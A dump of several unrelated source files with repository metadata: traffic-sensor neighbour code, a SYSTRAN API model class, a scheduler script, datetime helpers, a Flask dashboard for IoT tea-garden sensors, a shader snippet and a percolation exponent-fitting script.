distance 输入两地经纬度,计算距离 输出单位 米
'''
import math
def distance(origin, destination):
lat1, lon1 = origin
lat2, lon2 = destination
radius = 6378.137 # km
dlat = math.radians(lat2-lat1)
dlon = math.radians(lon2-lon1)
a = math.sin(dlat/2) * math.sin(dlat/2) + math.cos(math.radians(lat1)) \
* math.cos(math.radians(lat2)) * math.sin(dlon/2) * math.sin(dlon/2)
c = 2 * math.atan2(math.sqrt(a), math.sqrt(1-a))
d = radius * c*1000
return d
'''
根据所选城市,提取出所有监控点的位置
输出【ID,LA,LN】
'''
def PointDeControleVille(metaDataTraffice,ville):
metaDataVille = []
for c in range(0,len(metaDataTraffice)):
if metaDataTraffice[c][16] ==ville:
# print(metaDataTraffice[c][25]+","+metaDataTraffice[c][12]+","+metaDataTraffice[c][19]+","+metaDataTraffice[c][13]+","+metaDataTraffice[c][5])
metaDataVille.append([metaDataTraffice[c][20],metaDataTraffice[c][12],metaDataTraffice[c][19],metaDataTraffice[c][13],metaDataTraffice[c][5]])
F = lambda a:(a[0],Traite(a[1],a[3]),Traite(a[2],a[4]))
re = F(metaDataVille)
# metaDataVille = map(lambda (a):([int(a[0]),Traite(a[1],a[3]),Traite(a[2],a[4])]),metaDataVille)
return re
ponitTraffic = PointDeControleVille(metaDataTraffice,villeChoisie)
'''
输入 moi 自己所在点【ID,LA,LN】,
输入 Doc 即监控点ID和位置信息
输入 邻居范围
输出 邻居列表 【ID,LA,LN】
第一个位置表示自己, 即 自己 + 邻居
'''
def VoisinDePoint(moi,Doc,Dis):
MoiLA = 0
MoiLON = 0
listVoisin = []
for c in range(0,len(Doc)):
if Doc[c][0] == moi:
MoiLA = Doc[c][1]
MoiLON = Doc[c][2]
listVoisin.append([moi,MoiLA,MoiLON])
for c in range(0,len(Doc)):
if Doc[c][0] != moi and distance([MoiLA,MoiLON],[Doc[c][1],Doc[c][2]])<Dis:
listVoisin.append(Doc[c])
return listVoisin
'''
输入 pt 即所有节点信息,对应 ponitTraffic
输入 dis 距离
输出 [本节点,+若干邻居节点列表]
'''
def TousLesVoisin(pt,dis):
resultat = []
for c in range(0,len(pt)):
temp = VoisinDePoint(pt[c][0],ponitTraffic,dis)
if len(temp[1:]) <= miniNumVoisin:
temp = VoisinDePoint(pt[c][0],ponitTraffic,dis*3)
if len(temp[1:]) <= miniNumVoisin:
print (temp[0])
# resultat.append([temp[0][0],dis,len(temp[1:]),map(lambda a:a[0],temp[1:])])
resultat.append(map(lambda a:a[0],temp))
return resultat
tousLesVoisinsDeTouslesPionts = TousLesVoisin(ponitTraffic,distanceEntreVoision)
'''
需要描述一些邻居节点信息
1 多少观察节点,
2 邻居数据均值,最大值,最小值
'''
def discription(info):
numVoisions = map(lambda a:len(a),info)
chiffre = [len(numVoisions),np.average(numVoisions),np.max(numVoisions),np.min(numVoisions)]
print ['nombreux','moyenne','max','min']
print (chiffre)
discription(tousLesVoisinsDeTouslesPionts)
'''
#X,Y 黑点表示,全部Aarhus的点
#'''
#X = map(lambda (a):(a[1]-56),ponitTraffic)
#Y = map(lambda (a):(a[2]-10),ponitTraffic)
#'''
#lvX lvY自己和邻居的点 红色 蓝色
#'''
#lvX = map(lambda (a):(a[1]-56),listVoisin)
#lvY = map(lambda (a):(a[2]-10),listVoisin)
#import matplotlib.pyplot as plt
#
#plt.xlim()
#
#plt.xlim(min(X)*0.99, max(X)*1.01)
#plt.ylim(min(Y)*0.99, max(Y)*1.01)
#
#plt.plot(X,Y,'ko')
#plt.plot(lvX[1:],lvY[1:],'bo')
#plt.plot(lvX[0],lvY[0],'ro')
##plt.plot(listVoisin[2:][1],listVoisin[2:][2],'bo',label="point")
##plt.plot(listVoisin[0][1],listVoisin[0][2],'ro',label="point")
#plt.legend()
#plt.show()
'''
'''
import numpy as np
import csv
#csvfile = file('listVoisin.csv', 'wb')
#writer = csv.writer(csvfile)
#writer.writerow(['rapportID','LA','LON'])
#writer.writerows(listVoisin)
#csvfile.close()
np.save('tousLesVoisinsDeTouslesPionts.npy',tousLesVoisinsDeTouslesPionts)
| [
"jy02407380@gmail.com"
] | jy02407380@gmail.com |
f7134ab899e5626e209759210f286d569054a216 | a910ad156f76b5de7061f63da12e19de43be406d | /systran_resources_api/models/dictionaries_list_response.py | 2c1cc63989b18587501f760b7a6b16fabf2b941e | [
"Apache-2.0"
] | permissive | yingfei0913/resources-api-python-client | efdf1b05831fc78d266ee09412bf8256ebcfd218 | c1640a6ff81f7774d3c0cf02ddb28a412f7a027b | refs/heads/master | 2021-05-31T20:34:20.904274 | 2016-08-09T09:19:59 | 2016-08-09T09:19:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,906 | py | #!/usr/bin/env python
# coding: utf-8
"""
Copyright 2015 SYSTRAN Software, Inc. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
class DictionariesListResponse(object):
"""
NOTE: This class is auto generated by the systran code generator program.
Do not edit the class manually.
"""
def __init__(self):
"""
Systran model
:param dict systran_types: The key is attribute name and the value is attribute type.
:param dict attribute_map: The key is attribute name and the value is json key in definition.
"""
self.systran_types = {
'total_no_limit': 'int',
'dictionaries': 'list[DictionaryOutput]'
}
self.attribute_map = {
'total_no_limit': 'totalNoLimit',
'dictionaries': 'dictionaries'
}
# Number of dictionaries without skip/limit filter
self.total_no_limit = None # int
# List of dictionaries
self.dictionaries = None # list[DictionaryOutput]
def __repr__(self):
properties = []
for p in self.__dict__:
if p != 'systran_types' and p != 'attribute_map':
properties.append('{prop}={val!r}'.format(prop=p, val=self.__dict__[p]))
return '<{name} {props}>'.format(name=__name__, props=' '.join(properties))
| [
"nguyendc@systran.fr"
] | nguyendc@systran.fr |
1c2c9c2b5cd114cf7f5b45215070474a1c0c009c | 8c9acb401907ab97a24e85290459db209f56b2e9 | /Task.py | 36b0db8abd1b01151fa42e22e70022677d0aacb6 | [
"Apache-2.0"
] | permissive | Daudxu/taskScheduler | 141570d4427091d7dcb9cba886ef4eee59a57f26 | cd3f6f97b8f94ce42372f65a8557f83468be2395 | refs/heads/master | 2020-09-30T20:47:06.192713 | 2020-07-18T07:13:23 | 2020-07-18T07:13:23 | 227,370,084 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 899 | py | import time
from taskModel import taskJobModel
from apscheduler.schedulers.blocking import BlockingScheduler
def func():
ts = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
taskObj = taskJobModel('husike')
taskObj.bark()
# res = taskObj.autoCancelOrder()
# print('do func time :',ts)
# print(res)
print('自动确认发货定时任务-时间:', ts)
# time.sleep(2)
def func2():
# 耗时2S
ts = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
print('do func2 time:', ts)
time.sleep(2)
# 自动取消订单
def dojob():
# 创建调度器:BlockingScheduler
scheduler = BlockingScheduler()
# 添加任务,时间间隔2S
scheduler.add_job(func, 'interval', seconds=2, id='test_job1')
# 添加任务,时间间隔5S
# scheduler.add_job(func2, 'interval', seconds=3, id='test_job2')
scheduler.start()
dojob() | [
"875126243@qq.com"
] | 875126243@qq.com |
8ea08f6a84070e59475e3de8786df6296cbdddd9 | a989ff888d86eaad7d3572993d89af17bb29c7ec | /kartverket_stormsurge/helper/datetimes.py | 981e44efed210c6a738f00d83a0f60092b15ec65 | [
"MIT"
] | permissive | jerabaul29/kartverket_storm_surge_data | 8f873232a3aff92f07a73220e51f8385278a029a | 9a35492550ec8b3f4c0b7f1d17bf3bb4776f2c49 | refs/heads/master | 2023-01-31T02:17:34.834755 | 2020-12-15T10:30:54 | 2020-12-15T10:30:54 | 287,529,304 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,229 | py | import datetime
import pytz
from kartverket_stormsurge.helper.raise_assert import ras
def assert_is_utc_datetime(date_in):
"""Assert that date_in is an UTC datetime."""
ras(isinstance(date_in, datetime.datetime))
if not (date_in.tzinfo == pytz.utc or
date_in.tzinfo == datetime.timezone.utc):
raise Exception("not utc!")
if date_in.tzinfo == pytz.utc:
print("prefer using datetime.timezone.utc to pytz.utc")
def assert_10min_multiple(date_in):
"""Assert that date_in is a datetime that is a
multiple of 10 minutes.
"""
ras(isinstance(date_in, datetime.datetime))
ras(date_in.second == 0)
ras((date_in.minute % 10) == 0)
ras(date_in.microsecond == 0)
def datetime_range(datetime_start, datetime_end, step_timedelta):
"""Yield a datetime range, in the range [datetime_start; datetime_end[,
with step step_timedelta."""
assert_is_utc_datetime(datetime_start)
assert_is_utc_datetime(datetime_end)
ras(isinstance(step_timedelta, datetime.timedelta))
ras(datetime_start < datetime_end)
ras(step_timedelta > datetime.timedelta(0))
crrt_time = datetime_start
yield crrt_time
while True:
crrt_time += step_timedelta
if crrt_time < datetime_end:
yield crrt_time
else:
break
def datetime_segments(datetime_start, datetime_end, step_timedelta):
"""Generate a succession of segments, that cover [datetime_start; datetime_end].
The segments will have length step_timedelta, except possibly the last segment
that may be shorter."""
assert_is_utc_datetime(datetime_start)
assert_is_utc_datetime(datetime_end)
ras(isinstance(step_timedelta, datetime.timedelta))
ras(datetime_start < datetime_end)
ras(step_timedelta > datetime.timedelta(0))
crrt_segment_start = datetime_start
crrt_segment_end = crrt_segment_start + step_timedelta
while True:
if crrt_segment_end >= datetime_end:
yield (crrt_segment_start, datetime_end)
break
else:
yield (crrt_segment_start, crrt_segment_end)
crrt_segment_start += step_timedelta
crrt_segment_end += step_timedelta
| [
"jean.rblt@gmail.com"
] | jean.rblt@gmail.com |
c13a2b0d141bee4a20c7232dee4588ebe627c68d | d45721f15b0e62acbab0a293c7dd464c4651804f | /app.py | 9baa0218d72e9172b292e53edb56536c740b05dc | [] | no_license | zhenqiu/iotea | 40875776e39760937c458660fb4bf8e2b412eae5 | af25d535f8c7d470c532ded597323c433a878cbf | refs/heads/master | 2020-03-22T19:30:35.013820 | 2018-07-11T06:31:50 | 2018-07-11T06:31:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,047 | py | from flask import Flask,request,url_for,render_template,redirect,jsonify
import json,db,threading,time,datetime
#loriot
app=Flask(__name__)
@app.route('/')#iotea
def index():
return render_template('index1.html')
@app.route("/sendjson", methods=['GET','POST'])
def sendjson():
data = db.readMax()
t = {
'Data': [data[0][5], data[0][6], data[0][10], data[0][8], data[0][11], data[0][9], data[0][12], data[0][13]]
# { Temperature, Humidity, Illumination, Carbon Dioxide, Oxygen, Dust, soil_temp, soil_hum }
}
# print(t)
send = json.dumps(t)
return send
@app.route("/initday", methods=['GET','POST'])
def initday():
anchorDay = []
DateDay = []
TemperatureDay = []
HumidityDay = []
IlluminationDay = []
CarbonDioxideDay = []
OxygenDay = []
DustDay = []
SoilTempDay = []
SoilHumDay = []
# data = db.readMax()
days = beforeDays(1)
# today = str(datetime.date.today())
# 显示的坐标轴锚点
# anchorDay.append({'value': [str(days[0])[5:] + " 00:00:00", 0]})
# anchorDay.append({'value': [today[5:] + " 00:00:00", 0]})
utc_dt = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc)
bj_dt = utc_dt.astimezone(datetime.timezone(datetime.timedelta(hours=8)))
year = str(bj_dt.year)
month = ""
day = ""
if int(bj_dt.month) < 10:
month = '0' + str(bj_dt.month)
else:
month = str(bj_dt.month)
if int(bj_dt.day) < 10:
day = '0' + str(bj_dt.day)
else:
day = str(bj_dt.day)
today = "%s-%s-%s" % (year, month, day)
QueryTime = []
for day in days:
for hour in range(0, 24):
if hour < 10:
QueryTime = [str(day), '0' + str(hour)]
else:
QueryTime = [str(day), str(hour)]
old = db.readMinMinute(QueryTime)
if not old:
QueryTime = [str(day), str(hour)]
old = db.readMinMinute(QueryTime)
try:
date = str(day)
date = date[:4] + '/' + date[5:7] + '/' + date[8:]
moment = date + ' ' + old[0][2] + ':' + old[0][3] + ':' + old[0][4]
# moment = str(hour)
# {value: ['2016/12/18 6:38:08', 80]}
DateDay.append(str(hour))
TemperatureDay.append({'name': moment, 'value': [str(hour), old[0][5]]})
HumidityDay.append({'name': moment, 'value': [str(hour), old[0][6]]})
IlluminationDay.append({'name': moment, 'value': [str(hour), old[0][10]]})
CarbonDioxideDay.append({'name': moment, 'value': [str(hour), old[0][8]]})
oxy = old[0][11]
# print(oxy.find('%'))
if int(oxy.find('%')) >= 0:
OxygenDay.append({'name': moment, 'value': [str(hour), oxy[:-1]]})
else:
OxygenDay.append({'name': moment, 'value': [str(hour), oxy]})
DustDay.append({'name': moment, 'value': [str(hour), old[0][9]]})
SoilTempDay.append({'name': moment, 'value': [str(hour), old[0][12]]})
SoilHumDay.append({'name': moment, 'value': [str(hour), old[0][13]]})
except Exception:
pass #应该传给前端数据缺少标志 前端显示缺少数据
# 取得今天零点数据
# today = datetime.date.today()
QueryTime = [today, '00']
old = db.readMinMinute(QueryTime)
if not old:
QueryTime = [str(today), '0']
old = db.readMinMinute(QueryTime)
try:
date = str(today)
date = date[:4] + '/' + date[5:7] + '/' + date[8:]
moment = date + ' ' + old[0][2] + ':' + old[0][3] + ':' + old[0][4]
DateDay.append('24')
TemperatureDay.append({'name': moment, 'value': ['24', old[0][5]]})
HumidityDay.append({'name': moment, 'value': ['24', old[0][6]]})
IlluminationDay.append({'name': moment, 'value': ['24', old[0][10]]})
CarbonDioxideDay.append({'name': moment, 'value': ['24', old[0][8]]})
oxy = old[0][11]
if int(oxy.find('%')) >= 0:
OxygenDay.append({'name': moment, 'value': ['24', oxy[:-1]]})
else:
OxygenDay.append({'name': moment, 'value': ['24', oxy]})
DustDay.append({'name': moment, 'value': ['24', old[0][9]]})
SoilTempDay.append({'name': moment, 'value': ['24', old[0][12]]})
SoilHumDay.append({'name': moment, 'value': ['24', old[0][13]]})
except Exception:
pass
t = {
# 'Data': [data[0][5], data[0][6], data[0][10], data[0][8], data[0][11], data[0][9]],
# 'anchorDay': anchorDay,
'Today' : today,
'DateDay': DateDay,
'TemperatureDay': TemperatureDay,
'HumidityDay': HumidityDay,
'IlluminationDay': IlluminationDay,
'CarbonDioxideDay': CarbonDioxideDay,
'OxygenDay': OxygenDay,
'DustDay': DustDay,
'SoilTempDay': SoilTempDay,
'SoilHumDay': SoilHumDay
}
init = json.dumps(t)
return init
@app.route("/initweek", methods=['GET','POST'])
def initweek():
anchorWeek = []
DateWeek = []
TemperatureWeek = []
HumidityWeek = []
IlluminationWeek = []
CarbonDioxideWeek = []
OxygenWeek = []
DustWeek = []
SoilTempWeek = []
SoilHumWeek = []
week = beforeDays(7)
# today = str(datetime.date.today())
# anchorWeek.append({'value': [str(week[0])[5:] + " 00:00:00", 0]})
# anchorWeek.append({'value': [today[5:] + " 00:00:00", 0]})
for day in week:
for hour in range(4, 21, 8):
QueryTime = []
if hour < 10:
QueryTime = [str(day), '0' + str(hour)]
else:
QueryTime = [str(day), str(hour)]
old = db.readMinMinute(QueryTime)
if not old:
QueryTime = [str(day), str(hour)]
old = db.readMinMinute(QueryTime)
threeTimeOfDay = ""
if hour == 4:
pass
elif hour == 12:
threeTimeOfDay = " noon"
else:
threeTimeOfDay = " even"
try:
date = str(day)
date = date[:4] + '/' + date[5:7] + '/' + date[8:]
DateWeek.append(date[5:] + threeTimeOfDay)
moment = date + ' ' + old[0][2] + ':' + old[0][3] + ':' + old[0][4]
xAxisTime = removeZero(date[5:])
TemperatureWeek.append({'name': moment, 'value': [xAxisTime + threeTimeOfDay, old[0][5]]})
HumidityWeek.append({'name': moment, 'value': [xAxisTime + threeTimeOfDay, old[0][6]]})
IlluminationWeek.append({'name': moment, 'value': [xAxisTime + threeTimeOfDay, old[0][10]]})
CarbonDioxideWeek.append({'name': moment, 'value': [xAxisTime + threeTimeOfDay, old[0][8]]})
oxy = old[0][11]
if int(oxy.find('%')) >= 0:
OxygenWeek.append({'name': moment, 'value': [xAxisTime + threeTimeOfDay, oxy[:-1]]})
else:
OxygenWeek.append({'name': moment, 'value': [xAxisTime + threeTimeOfDay, oxy]})
DustWeek.append({'name': moment, 'value': [xAxisTime + threeTimeOfDay, old[0][9]]})
SoilTempWeek.append({'name': moment, 'value': [xAxisTime + threeTimeOfDay, old[0][12]]})
SoilHumWeek.append({'name': moment, 'value': [xAxisTime + threeTimeOfDay, old[0][13]]})
except Exception:
date = str(day)
date = date[:4] + '/' + date[5:7] + '/' + date[8:]
DateWeek.append(date[5:]+threeTimeOfDay)
moment = date + ' ' + str(hour) + ':00:00'
xAxisTime = removeZero(date[5:])
TemperatureWeek.append({'name': moment, 'value': [xAxisTime+threeTimeOfDay, '0']})
HumidityWeek.append({'name': moment, 'value': [xAxisTime+threeTimeOfDay, '0']})
IlluminationWeek.append({'name': moment, 'value': [xAxisTime+threeTimeOfDay, '0']})
CarbonDioxideWeek.append({'name': moment, 'value': [xAxisTime+threeTimeOfDay, '0']})
OxygenWeek.append({'name': moment, 'value': [xAxisTime+threeTimeOfDay, '0']})
DustWeek.append({'name': moment, 'value': [xAxisTime+threeTimeOfDay, '0']})
SoilTempWeek.append({'name': moment, 'value': [xAxisTime+threeTimeOfDay, '0']})
SoilHumWeek.append({'name': moment, 'value': [xAxisTime+threeTimeOfDay, '0']})
t = {
# 'anchorWeek': anchorWeek,
'DateWeek': DateWeek,
'TemperatureWeek': TemperatureWeek,
'HumidityWeek': HumidityWeek,
'IlluminationWeek': IlluminationWeek,
'CarbonDioxideWeek': CarbonDioxideWeek,
'OxygenWeek': OxygenWeek,
'DustWeek': DustWeek,
'SoilTempWeek': SoilTempWeek,
'SoilHumWeek': SoilHumWeek
}
init = json.dumps(t)
return init
@app.route("/initmonth", methods=['GET','POST'])
def initmonth():
anchorMonth = []
DateMonth = []
TemperatureMonth = []
HumidityMonth = []
IlluminationMonth = []
CarbonDioxideMonth = []
OxygenMonth = []
DustMonth = []
SoilTempMonth = []
SoilHumMonth = []
month = beforeDays(31)
# today = str(datetime.date.today())
# anchorMonth.append({'value': [str(month[0])[5:] + " 00:00:00", 0]})
# anchorMonth.append( {'value': [today[5:] + " 00:00:00", 0]})
for day in month:
old = db.readByDate(str(day))
try:
date = str(day)
date = date[:4] + '/' + date[5:7] + '/' + date[8:]
DateMonth.append(date[5:])
moment = date + ' ' + old[0][2] + ':' + old[0][3] + ':' + old[0][4]
queryData = removeZero(date[5:])
TemperatureMonth.append({'name': moment, 'value': [queryData, old[0][5]]})
HumidityMonth.append({'name': moment, 'value': [queryData, old[0][6]]})
IlluminationMonth.append({'name': moment, 'value': [queryData, old[0][10]]})
CarbonDioxideMonth.append({'name': moment, 'value': [queryData, old[0][8]]})
oxy = old[0][11]
if int(oxy.find('%')) >= 0:
OxygenMonth.append({'name': moment, 'value': [queryData, oxy[:-1]]})
else:
OxygenMonth.append({'name': moment, 'value': [queryData, oxy]})
DustMonth.append({'name': moment, 'value': [queryData, old[0][9]]})
SoilTempMonth.append({'name': moment, 'value': [queryData, old[0][12]]})
SoilHumMonth.append({'name': moment, 'value': [queryData, old[0][13]]})
except Exception:
date = str(day)
date = date[:4] + '/' + date[5:7] + '/' + date[8:]
DateMonth.append(date[5:])
moment = date + " 00:00:00"
queryData = removeZero(date[5:])
TemperatureMonth.append({'name': moment, 'value': [queryData, '0']})
HumidityMonth.append({'name': moment, 'value': [queryData, '0']})
IlluminationMonth.append({'name': moment, 'value': [queryData, '0']})
CarbonDioxideMonth.append({'name': moment, 'value': [queryData, '0']})
OxygenMonth.append({'name': moment, 'value': [queryData, '0']})
DustMonth.append({'name': moment, 'value': [queryData, '0']})
SoilTempMonth.append({'name': moment, 'value': [queryData, '0']})
SoilHumMonth.append({'name': moment, 'value': [queryData, '0']})
t = {
# 'anchorMonth': anchorMonth,
'DateMonth': DateMonth,
'TemperatureMonth': TemperatureMonth,
'HumidityMonth': HumidityMonth,
'IlluminationMonth': IlluminationMonth,
'CarbonDioxideMonth': CarbonDioxideMonth,
'OxygenMonth': OxygenMonth,
'DustMonth': DustMonth,
'SoilTempMonth': SoilTempMonth,
'SoilHumMonth': SoilHumMonth
}
init = json.dumps(t)
return init
def beforeDays(n):
utc_dt = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc)
bj_dt = utc_dt.astimezone(datetime.timezone(datetime.timedelta(hours=8)))
before_n_days = []
for i in range(1, n+1)[::-1]:
before_n_days.append(str(bj_dt.date() - datetime.timedelta(days=i)))
return before_n_days
def removeZero(string):
xAxisTime = string
if xAxisTime[0] == '0':
xAxisTime = xAxisTime[1:]
loc = xAxisTime.find('/')
if xAxisTime[loc+1] == '0':
xAxisTime = xAxisTime[:loc+1] + xAxisTime[loc+2:]
return xAxisTime
if __name__=="__main__":
# ta = threading.Thread(target=app.run(debug=True, port=5000))#, ssl_context='adhoc'))
# tb = threading.Thread(target=loriot.getLoriotData)
app.run(debug=True, port=5000)
# ta.start()
# tb.start()
| [
"yu.bill@hotmail.com"
] | yu.bill@hotmail.com |
efb758695b1633497870906b498201d9ad1152c0 | a42682a84c6cc943f68139f7daeba0d4991d5ec8 | /game/THREE/renderers/shaders/schunk/aomap_pars_fragment.py | 421270daf1eb4ed1fbf89caa258f7e402a3b24ca | [] | no_license | alijaya/Test-OpenGL-Renpy | cf213e8bd6a63a49811f44fd7581666b284ac561 | 502be62712d2d90eca28fc36d0679e94896a88ba | refs/heads/master | 2021-06-21T12:49:34.709115 | 2017-08-15T01:23:02 | 2017-08-15T01:23:02 | 100,321,839 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 91 | py | """
#ifdef USE_AOMAP
uniform sampler2D aoMap;
uniform float aoMapIntensity;
#endif
"""
| [
"alijayameilio@gmail.com"
] | alijayameilio@gmail.com |
b9102cfe6e9b3b6d3b6fdd86abffeabd7cb7b1fe | ad27b8cd9b60831fe39ef78a614f220821a589fb | /violin_plotter.py | bc69f67a0a257707f19af0dc64fa51d717845751 | [] | no_license | mhk29/QCLabDB | 2ed7ea80ed5a2360d04eb7aa976fb0a466c41b44 | d64fe30a97014016430a8c350bf1797251839193 | refs/heads/master | 2022-12-27T08:11:33.050713 | 2020-10-07T14:18:33 | 2020-10-07T14:18:33 | 294,422,555 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 805 | py | import numpy as np
import matplotlib.pyplot as plt
import sys, argparse, csv
import collections
# from settings import *
np.random.seed(19680206)
fs = 10 # fontsize
# data_path = 'testcsv.csv'
data_path = argv[1]
with open(data_path, 'r') as f:
reader = csv.reader(f, delimiter=',')
headers = next(reader)
data = np.array(list(reader)).astype(float)
a = int(argv[2]);
b = int(argv[3]);
fig, axes = plt.subplots(nrows=1, ncols=1, figsize=(6, 6))
axes.violinplot(data, points=20, widths=0.3,
showmeans=True, showextrema=True, showmedians=True)
axes.set_title('violinplot', fontsize=fs)
axes.set_xticks([1,2])
axes.set_xticklabels([a,b])
# r = np.corrcoef(data[:,a],data[:,b])
# print(r)
fig.suptitle("Violin Plotting")
fig.subplots_adjust(hspace=0.4)
plt.show()
| [
"noreply@github.com"
] | mhk29.noreply@github.com |
fb6a09341d539337059741848aeb866dc91ef36d | f2ceab80e38a6113b59858e7f574cd9b74d1bdd7 | /gmatching.py | b6a1d7456e5d6c63da2005ab3e53a3ed17f11893 | [] | no_license | ldlongo/Percolacion | eaf50cd1fe1ff13a33554c4b0a843ff0b147bb1b | 929d858844de4eefe65f78e62f937a76d2dbb6c4 | refs/heads/master | 2021-01-19T21:32:05.784666 | 2017-05-02T16:56:25 | 2017-05-02T16:56:25 | 88,660,594 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,192 | py | import matplotlib.pyplot as plt
import numpy as np
from scipy.optimize import curve_fit
#funcion para el ajuste
def func(x, a, b):
return (a*x)+b
data={} #diccionario de datos
#probas
archivo=['6.txt','128.txt']
key=['6','128']
for i in range(0,len(key)):
f=open(archivo[i],'r')
lines=f.readlines()[2:]
x=[]
y=[]
for line in lines:
p = line.split()
x.append(float(p[0]))
y.append(float(p[1]))
xv=np.array(x)
yv=np.array(y)
data[key[i]]=[xv,yv]
f.close()
'''
#--------------------------------------------------------------------------
#gamma matching
#Metodo 1: interseccion de pendientes
#Se grafican gammas vs p alrededor de pc para pc- y pc+ y se busca donde
#se intersectan ambas curvas
#--------------------------------------------------------------------------
pc=[0.587771, 0.5925]
gamasup={}
gamainf={}
for k in range(0,len(key)):
aux1=[]
aux2=[]
for i in range(0,len(data[key[k]][0])-1):
if data[key[k]][0][i]>pc[k]:
#defino
pinf=data[key[k]][0][i]
psup=data[key[k]][0][i+1]
m2inf=data[key[k]][1][i]
m2sup=data[key[k]][1][i+1]
#ademas sabemos que la derivada tiene que ser positiva me quedo con las que son posit
if (float(m2sup-m2inf)/float(psup-pinf))<0:
aux1.append(data[key[k]][0][i]-pc[k])
aux2.append(float(m2sup-m2inf)/float(psup-pinf))
gamasup[key[k]]=(aux1,aux2)
for k in range(0,len(key)):
aux1=[]
aux2=[]
for i in range(0,len(data[key[k]][0])-1):
if data[key[k]][0][i]<pc[k]:
#defino
pinf=data[key[k]][0][i]
psup=data[key[k]][0][i+1]
m2inf=data[key[k]][1][i]
m2sup=data[key[k]][1][i+1]
#ademas sabemos que la derivada tiene que ser positiva me quedo con las que son posit
if (float(m2sup-m2inf)/float(psup-pinf))>0:
aux1.append(-(data[key[k]][0][i]-pc[k]))
aux2.append(float(m2sup-m2inf)/float(psup-pinf))
gamainf[key[k]]=(aux1,aux2)
#---------------------------------------------------------------
#grafico:
#key[0] para 6 y key[1] para 128
L=0#0 o 1 si quiero L=6 o L=128
plt.figure(0)
#grafico en dos colores:
for i in range(0,len(data[key[L]][0])):
if data[key[L]][0][i]<pc[1]:
plt.plot(data[key[L]][0][i],data[key[L]][1][i],'ro')
else:
plt.plot(data[key[L]][0][i],data[key[L]][1][i],'bo')
plt.xlabel(r'$p$',size=15)
plt.ylabel(r'$M_{2}(p)$',size=15)
plt.figure(1)
plt.plot(gamainf[key[L]][0],gamainf[key[L]][1],'ro',label=r'$\gamma-$')
plt.plot(gamasup[key[L]][0],gamasup[key[L]][1],'bo',label=r'$\gamma+$')
plt.legend()
plt.xlabel(r'$|p-p_{c}|$')
plt.ylabel(r'$\gamma$'" gamma")
plt.show()
'''
#--------------------------------------------------------------------------
#gamma matching
#Metodo de pendientes paralelas
#Se grafican log(M2) VS log(p-pc) para p>pc y p<pc. Luego se buscan
#ajustes cuyas pendientes a lo largo de esas curvas que sean paralelas.
#--------------------------------------------------------------------------
#L 6: con n=4(cantidad de puntos del fit) y margen=0.001
#encontro un gamma =-2.13
#L 128: con n=4 (cantidad de puntos del fit) y margen=0.001
#encontro un gamma =-2.64
pc=[0.587771, 0.5925]
logfitxmas=[]
logfitymas=[]
L=1#0 o 1 si quiero L=6 o L=128
# y me contruyo dos graficos uno en pc+ y otro pc- ambos en log log
for i in range(0,len(data[key[L]][0])):
if data[key[L]][0][i]>pc[L]:
logfitxmas.append(np.log(data[key[L]][0][i]-pc[L]))
logfitymas.append(np.log(data[key[L]][1][i]))
logfitxmen=[]
logfitymen=[]
for i in range(0,len(data[key[L]][0])):
if data[key[L]][0][i]<pc[L]:
logfitxmen.append(np.log(pc[L]-data[key[L]][0][i]))
logfitymen.append(np.log(data[key[L]][1][i]))
#me muevo sobre las curvas (xmen,ymen) y (xmas,ymas), y elijo realizar ajustes tomando n puntos
n=4#numero de puntos que tomo para fit
gammamenos=[]#tiene las pendientes a lo largo de la curva gamma menos
ordenadamenos=[]
for i in range(0,len(logfitxmen)-n):
xdata=[]
ydata=[]
for j in range(0,n-1):
xdata.append(logfitxmen[i+j])
ydata.append(logfitymen[i+j])
parmfit=(curve_fit(func,xdata,ydata))
gammamenos.append(parmfit[0][0])
ordenadamenos.append(parmfit[0][1])
#me muevo sobre las curvas (xmen,ymen) y (xmas,ymas), y elijo realizar ajustes tomando n puntos
n=4#numero de puntos que tomo para fit
gammamas=[]#tiene las pendientes a lo largo de la curva gamma menos
ordenadamas=[]
for i in range(0,len(logfitxmas)-n):
xdata=[]
ydata=[]
parmfit=[]
for j in range(0,n-1):
xdata.append(logfitxmas[i+j])
ydata.append(logfitymas[i+j])
parmfit=(curve_fit(func,xdata,ydata))
#print parmfit[0][0]
gammamas.append(parmfit[0][0])
ordenadamas.append(parmfit[0][1])
#busco ahora gammas coincidentes en mas menos 0.01
#comparo todos con todos:
margen=0.001
matchmenos=[]#aca guardo las dos pendientes que coinciden y sus ordenadas
matchmas=[]
for i in range(0,len(gammamas)):
for j in range(0,len(gammamenos)):
# me fijo cual es menor
if (abs(gammamas[i]-gammamenos[j])<margen):
print "Encontro el siguiente match"
print (gammamas[i],gammamenos[j])
matchmenos=[gammamenos[j],ordenadamenos[j]]
matchmas=[gammamas[i],ordenadamas[i]]
#Grafico 1#gammamas
plt.figure(0)
for i in range(0,len(gammamas)):#numero de fits que tengo
xfit=np.zeros(len(logfitxmas))
yfit=np.zeros(len(logfitxmas))
for j in range(0,len(logfitxmas)):
parmfit=[gammamas[i],ordenadamas[i]]
xfit[j]=logfitxmas[j]
yfit[j]=(func(logfitxmas[j],*parmfit))
plt.plot(xfit,yfit,'b-')
plt.plot(logfitxmas,logfitymas,'bo',label=r'$\gamma+$')
plt.xlabel(r'$log |p-p_{c}|$')
plt.ylabel("log M2")
plt.legend()
#Grafico 2#gammamenos
plt.figure(1)
for i in range(0,len(gammamenos)):#numero de fits que tengo
xfit=np.zeros(len(logfitxmen))
yfit=np.zeros(len(logfitxmen))
for j in range(0,len(logfitxmen)):
parmfit=[gammamenos[i],ordenadamenos[i]]
xfit[j]=logfitxmen[j]
